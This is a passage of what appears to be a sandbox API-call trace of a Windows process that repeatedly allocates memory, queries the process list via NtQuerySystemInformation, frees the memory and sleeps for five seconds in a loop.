ResultLength=0x0) returned 0xc0000004 [0247.400] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.401] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.401] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.405] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.406] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.408] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.408] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.409] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.409] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.410] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.414] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.415] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.417] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.417] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.418] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.419] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.419] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.425] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.425] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.427] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.428] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.429] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.429] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.430] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.434] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.435] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.437] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.437] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.438] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.438] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.439] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.443] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.445] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.446] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.447] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.448] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.448] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.448] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.453] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.453] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.455] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.455] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.456] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.456] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.457] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.462] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.463] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.465] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.465] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.466] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.466] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.466] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.471] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.472] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.474] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.474] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.475] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.475] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.475] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.480] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.481] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.483] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.484] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.484] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.485] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.485] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.491] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.492] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.493] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.493] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.494] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.494] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.494] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.498] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.499] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.500] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.501] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.501] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.502] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.502] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.506] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.507] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.509] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.509] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.511] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.511] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.511] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.516] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.517] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.519] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.519] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.520] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.520] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.520] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.525] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.526] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.528] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.528] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.529] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.529] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.529] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.534] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.536] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.537] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.538] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.539] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.539] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.539] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.544] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.545] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.546] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.547] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.548] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.548] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.548] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.552] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.553] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.555] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.555] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.556] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.557] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.557] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.561] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.562] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.564] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.564] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.565] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.565] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.565] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.570] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.571] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.572] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.572] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.573] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.573] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.573] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.577] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.578] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.580] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.581] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.582] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.582] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.582] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.588] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.589] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.592] NtAllocateVirtualMemory (in: 